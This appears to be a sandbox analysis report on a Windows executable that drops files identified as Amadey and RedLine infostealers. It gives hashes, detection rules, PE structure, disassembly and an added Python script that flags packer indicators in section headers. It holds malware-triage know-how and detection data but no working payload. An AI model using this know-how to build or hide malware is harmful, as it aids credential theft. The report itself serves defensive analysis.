                                                                                                                                                                                                                                  SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                                                                                                                                                                                  SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                                                                                                                                                                                                  SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2843
                                                                                                                                                                                                                                  Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx15:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtX
                                                                                                                                                                                                                                  MD5:B8422A20BE05209187B69B7EEFA138B5
                                                                                                                                                                                                                                  SHA1:E1FDD185B2277732AB2D728A2657291077A66811
                                                                                                                                                                                                                                  SHA-256:FAD57E6847B4B32DF6AE6665F75F388886058EB6CC492718EED2589D830C626E
                                                                                                                                                                                                                                  SHA-512:1729D8A82C212C61E2395941D3B23625A5EF09EDEA7AA25E6653827E3259EC11A38885C296E12AE82A82A1338066AFFFAEF389F21EE887DA18AC489E39B64B73
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\szDGo5lHdI.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):231424
                                                                                                                                                                                                                                  Entropy (8bit):6.351317966279805
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:4rzyIG8IcCnD5A2QdY8rWpau1CYUqfhYdMBg:KmlLnD5qdY8Fu1CYUehrBg
                                                                                                                                                                                                                                  MD5:8627EBE3777CC777ED2A14B907162224
                                                                                                                                                                                                                                  SHA1:06EEED93EB3094F9D0B13AC4A6936F7088FBBDAA
                                                                                                                                                                                                                                  SHA-256:319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB
                                                                                                                                                                                                                                  SHA-512:9DE429300C95D52452CAEB80C9D44FF72714F017319E416649C2100F882C394F5AB9F3876CC68D338F4B5A3CD58337DEFFF9405BE64C87D078EDD0D86259C845
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: bCHMhfe2vn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: JWwmlPG6T4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: lz1sDblrYC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: 2OFtBU6Tvq.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: tb5QNVq4tA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: wD1HavDmzM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: d1CNSOQG6J.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: amXdEMvtjh.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: qRIHmQVYic.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: oPHmWw9Rxf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: geMizFBwNi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: E8DQP4nJIj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: r0cTE8cVSm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: xj1TpEtv4z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: FmgrIPCiXX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: yTiVDw9gIM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: no5jA7VYxT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: WqPen4qUki.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: gfXRZ7m99K.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L...gv.d.............................V............@.......................................@..................................M..d................................'...#..p....................$.......#..@............................................text...}........................... ..`.rdata..p...........................@..@.data...H'...`.......F..............@....rsrc................^..............@..@.reloc...'.......(...`..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\szDGo5lHdI.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):858624
                                                                                                                                                                                                                                  Entropy (8bit):7.9173206349168845
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:lMrOy90U9S1jZY7zjt4IrITYlgomWCWx8gl0GuNVn1DTYbgiCFC7D4jghvlWTUPL:LyH9UyyI9goXZ8gRuN34mC4jqly4P
                                                                                                                                                                                                                                  MD5:566C1099548DF136503F4DC814D54B17
                                                                                                                                                                                                                                  SHA1:31F3A2230D7043D645B5451DDBCA0FECE20DE8B9
                                                                                                                                                                                                                                  SHA-256:B251936E101904F6A72600EB714E7127B89E19E0EF9B4A64FD1578CE62208AF5
                                                                                                                                                                                                                                  SHA-512:D8D4507A960834EC68786D313321EA2186B09E08C47AEC73EF5067CA60550AA1D31D88C83B90C66A1602A25B8F124254409C0002D8A3DC3044C6FF372908C4BE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................p............@...... ...........................................................`..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):179200
                                                                                                                                                                                                                                  Entropy (8bit):4.951892860913068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:W9xqZWBJaHEDgXGJ5MS8IL1eXx9vhxbxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw9:WHqZVGJ5bHLYvh
                                                                                                                                                                                                                                  MD5:6FBFF2D7C9BA7F0A71F02A5C70DF9DFC
                                                                                                                                                                                                                                  SHA1:003DA0075734CD2D7F201C5B0E4779B8E1F33621
                                                                                                                                                                                                                                  SHA-256:CB56407367A42F61993842B66BCD24993A30C87116313C26D6AF9E37BBB1B6B3
                                                                                                                                                                                                                                  SHA-512:25842B9DF4767B16096F2BFCEDC9D368A9696E6C6D9C7B2C75987769A5B338AE04B23B1E89F18EEF2244E84F04E4ACF6AF56643A97ABFE5B605F66CBA0BAC27F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, Author: ditekSHen
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0.............~.... ........@.. ....................... ............@.................................,...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):713216
Entropy (8bit):7.890631801900666
Encrypted:false
SSDEEP:12288:FMrAy90gyVe3l8BrITJln173C6x8g00G4NGnmDyYygiHBCSDsv9hJlWTUP:9yxyVql8FAn1bz8gA4NhMhC7v9ly8
MD5:EBD95183957BECDB18025FC9D553B15E
SHA1:73A57EE27624459B13318E13148A5812F9AFC72A
SHA-256:23B519083DBE38A5E62CAA55B223BC7E9AE9F89075E241171005B31CCF903994
SHA-512:E4EBB6A5E5639E5A99E03F94AAA820BE48EFA6971C36B89661E8094081BF89C295CD60FE5EFE7E5DCD9517C1B5D60990BA714A5CC0287B82FE223F5B31807ABE
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):400896
Entropy (8bit):6.799070583318619
Encrypted:false
SSDEEP:6144:GpBL6vPRiUryaNB5HC6XkN9UomaZ4RPDNr:GpBGvPIUOaThCpDTQr
MD5:C49DABA1E54976E33808914E11DEE05B
SHA1:327511A93186C8595A55CAB5552C641FD06906C5
SHA-256:74F627228484CC1EF30DB15DCA717A6E35D89DAB79AA42EB3E40D10E5E82E547
SHA-512:CFAC97EEB2703D0FC11116AD405B7A1E80AB3BAB408D8456655F6B7EF319FCF548DD84EE511E429A92C42E5895CCF07FC151AFEFDED79A92BF99586D803EA253
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):353280
Entropy (8bit):7.694403263596913
Encrypted:false
SSDEEP:6144:KXy+bnr+Bp0yN90QEDbIT9olnx142x9Q4lJEXqx8gOMn0GVRaGo8vxg50mE:ZMrNy90pITylnv4AC6x8g30GfNvNmE
MD5:54A8FD200F50B6AF0F10CA6EB68471D3
SHA1:2952B9DAD85AD87BCE0B2EFDA76ABB1149DCE018
SHA-256:5FCEF4C6CF8F1815B6F4B54F6ACD3140DAFA5A24AFDFD876D570FD626CD191B0
SHA-512:00CBF08050A1AE1A7D188F8F1C265CA882D9FD15587B6F396973F8695A25727B223966A2A0886152675DFE6A6DA125FF6C9524A614578E71B5F05DFFF55A30A3
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):11264
Entropy (8bit):4.97029807367379
Encrypted:false
SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:7E93BACBBC33E6652E147E7FE07572A0
SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):341504
Entropy (8bit):6.481872228762081
Encrypted:false
SSDEEP:6144:NZ3LYwHUxsB2a9D4lJERA0Cr4x+WBQYLwzAW0nr:NZ38wHU2BsCi0R+Weowar
MD5:0B63FCA2981CA840B845011956E212AD
SHA1:293B8C4F0C8981AE5B568D1CD722E91C16476049
SHA-256:894D2B3D57258FE980414000FE66D5A483656746A12CEBF4849D883917F13C30
SHA-512:AA357E4991C4CCA3FA11FC0CB5483E439C398835B9361AEC715C384D319A5D43578B2E2EAB84EBB048E3B8D3F97951A997DD630D915FDCE030D499DD29D5197C
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.764342310125714
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:szDGo5lHdI.exe
File size:1228288
MD5:d20ba0ceff50b0a05c84f694e28462aa
SHA1:c7c3b70840660f8dd81770e3bd5200eb2feda120
SHA256:bfe36fe57256d59f04350be588333d644cf1aac03039d14dfce313aa60d42ced
SHA512:699336726b562a7b0ab766d15e305afca0ac7137a6105381fc4832c957f5b74dd27a8da478d2908b5ccebf0fddf2ac9822856ede31e9b1432c0ad4182c952fe6
SSDEEP:24576:u1F4VX4ZsIETa80JWFst9LqGfEBz9terTMH9MbMx9upUenl6O:u1FWWbETahMszqGfu0rYHqbMxQpPl
TLSH:6D45F14382E27D48F9268B739E1EC2E8B70DF670DE997B653218DA2F0075176C363A51
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L......a...........
Icon Hash:a4a4a08484a484e0
Entrypoint:0x4050c8
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x61EC0DDE [Sat Jan 22 13:59:58 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:9c97db954c6eab8dfde4a4fd207d98cc
Instruction
call 00007F48586CA793h
jmp 00007F48586C69CEh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F48586C8255h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F48586C6B69h
call 00007F48586C7AFDh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F48586C6C84h
test al, 40h
je 00007F48586C6B5Fh
call 00007F48586C7AE2h
mov dword ptr [eax], 00000022h
jmp 00007F48586C6B35h
push ebx
xor ebx, ebx
test al, 01h
je 00007F48586C6B68h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F48586C6BDDh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F48586C6B7Eh
call 00007F48586C7DDEh
add eax, 20h
cmp esi, eax
je 00007F48586C6B5Eh
call 00007F48586C7DD2h
add eax, 40h
cmp esi, eax
jne 00007F48586C6B5Fh
push dword ptr [ebp+0Ch]
call 00007F48586CB181h
pop ecx
test eax, eax
jne 00007F48586C6B59h
push esi
call 00007F48586CB12Dh
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F48586C6BD6h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x106f40 | 0x64 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x27b8000 | 0x1a612 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x27d3000 | 0xaa0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2d78 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1ac | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x106906 | 0x106a00 | False | 0.9755557249524036 | data | 7.985286241021559 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x108000 | 0x26af548 | 0x2600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x27b8000 | 0x1a612 | 0x1a800 | False | 0.38375221108490565 | data | 4.307961956559254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x27d3000 | 0x8178 | 0x8200 | False | 0.0734375 | data | 0.9144732522290139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
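Two rows of the section table carry the static packer tells that line up with the "Detected unpacking (overwrites its own PE header)" signature: .text has near-maximal entropy (7.98 bits per byte, close to the 8.0 ceiling) in a code section, and .data occupies 0x26af548 bytes in memory while holding only 0x2600 bytes on disk, the footprint of a stub that will decompress or decrypt a payload into that region at run time. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It serialises IMAGE_SECTION_HEADER records from the values in the table above (PointerToRawData is not given in the report and is left at 0, and .data's entropy is "unknown" there, so it is skipped), parses them back the way a PE loader would, and returns the indicators per section. The 7.0 entropy threshold and the 16x virtual-to-raw ratio are assumptions to tune against your own corpus.

```python
import math
import struct

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)  # 40

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Constructed from the report's section table; Characteristics is the numeric
# encoding of the flag names listed there. PointerToRawData is not in the
# report and is left 0 (the checks below do not use it).
REPORT_SECTIONS = [
    # name,    VirtualSize, VirtualAddress, SizeOfRawData, Characteristics
    (b".text",  0x106906,  0x1000,    0x106a00, 0x60000020),  # CODE|EXECUTE|READ
    (b".data",  0x26af548, 0x108000,  0x2600,   0xC0000040),  # INIT_DATA|READ|WRITE
    (b".rsrc",  0x1a612,   0x27b8000, 0x1a800,  0x40000040),  # INIT_DATA|READ
    (b".reloc", 0x8178,    0x27d3000, 0x8200,   0x42000040),  # INIT_DATA|DISCARDABLE|READ
]
# Entropy per section as reported; .data has no value ("unknown") in the report.
REPORT_ENTROPY = {".text": 7.985286, ".rsrc": 4.307962, ".reloc": 0.914473}

# Assumed thresholds: near-8 entropy in a code section and a >16x virtual/raw
# size ratio are common packer tells; tune them to your corpus.
ENTROPY_THRESHOLD = 7.0
INFLATION_RATIO = 16


def shannon_entropy(data):
    """Shannon entropy in bits per byte (0.0 for empty or constant data)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_section_table(rows):
    """Serialise (name, vsize, vaddr, rawsize, chars) rows as raw section headers."""
    return b"".join(
        struct.pack(SECTION_HEADER_FMT, name, vsize, vaddr, rawsize, 0, 0, 0, 0, 0, chars)
        for name, vsize, vaddr, rawsize, chars in rows
    )


def parse_section_headers(blob, count):
    """Decode `count` consecutive IMAGE_SECTION_HEADER records from `blob`."""
    sections = []
    for i in range(count):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER_FMT, blob, i * SECTION_HEADER_SIZE)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
            "rawptr": rawptr, "chars": chars,
        })
    return sections


def packer_indicators(sec, entropy=None):
    """Return the packer / self-modifying-code tells present in one section."""
    flags = []
    if entropy is not None and entropy >= ENTROPY_THRESHOLD and sec["chars"] & IMAGE_SCN_CNT_CODE:
        flags.append("high-entropy code section")
    # A raw size of 0 with any meaningful virtual size is treated as inflated too.
    if sec["vsize"] > max(sec["rawsize"], 1) * INFLATION_RATIO:
        flags.append("virtual size far exceeds raw size")
    if sec["chars"] & IMAGE_SCN_MEM_EXECUTE and sec["chars"] & IMAGE_SCN_MEM_WRITE:
        flags.append("writable and executable")
    return flags


def triage_sections(blob, count, entropies):
    """Map section name -> list of indicators for a raw section table."""
    return {s["name"]: packer_indicators(s, entropies.get(s["name"]))
            for s in parse_section_headers(blob, count)}


if __name__ == "__main__":
    table = build_section_table(REPORT_SECTIONS)
    for name, flags in triage_sections(table, len(REPORT_SECTIONS), REPORT_ENTROPY).items():
        print(f"{name:7s} {', '.join(flags) or 'no indicators'}")
```

On a real file, feed `parse_section_headers` the bytes starting at the first section header (e_lfanew + 4 + 20 + SizeOfOptionalHeader) with NumberOfSections from the COFF header, and compute `shannon_entropy` over each section's raw bytes instead of taking the report's figures. The ratio check is the one that matters most for samples like this one: a section that is tens of megabytes in memory but a few kilobytes on disk is reserved for a payload the stub has not written yet, which is exactly what the dynamic analysis later observed.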
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x27b88b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Spanish | Mexico
RT_ICON | 0x27b9758 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Spanish | Mexico
RT_ICON | 0x27ba000 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27bc5a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27bd650 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27bdab8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Spanish | Mexico
RT_ICON | 0x27be960 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Spanish | Mexico
RT_ICON | 0x27bf208 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Spanish | Mexico
RT_ICON | 0x27bf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Spanish | Mexico
RT_ICON | 0x27bfe38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Spanish | Mexico
RT_ICON | 0x27c23e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Spanish | Mexico
RT_ICON | 0x27c3488 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Spanish | Mexico
RT_ICON | 0x27c3e10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Spanish | Mexico
RT_ICON | 0x27c4278 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Spanish | Mexico
RT_ICON | 0x27c5120 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Spanish | Mexico
RT_ICON | 0x27c59c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Spanish | Mexico
RT_ICON | 0x27c5f30 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27c84d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27c9580 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27c9f08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Spanish | Mexico
RT_ICON | 0x27ca370 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Spanish | Mexico
                                                                                                                                                                                                                                  RT_ICON0x27cb2180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cbac00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cc1880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cc6f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cec980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27cfd400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_ICON0x27d06c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SpanishMexico
                                                                                                                                                                                                                                  RT_DIALOG0x27d0b300x86data
                                                                                                                                                                                                                                  RT_STRING0x27d0bb80x490data
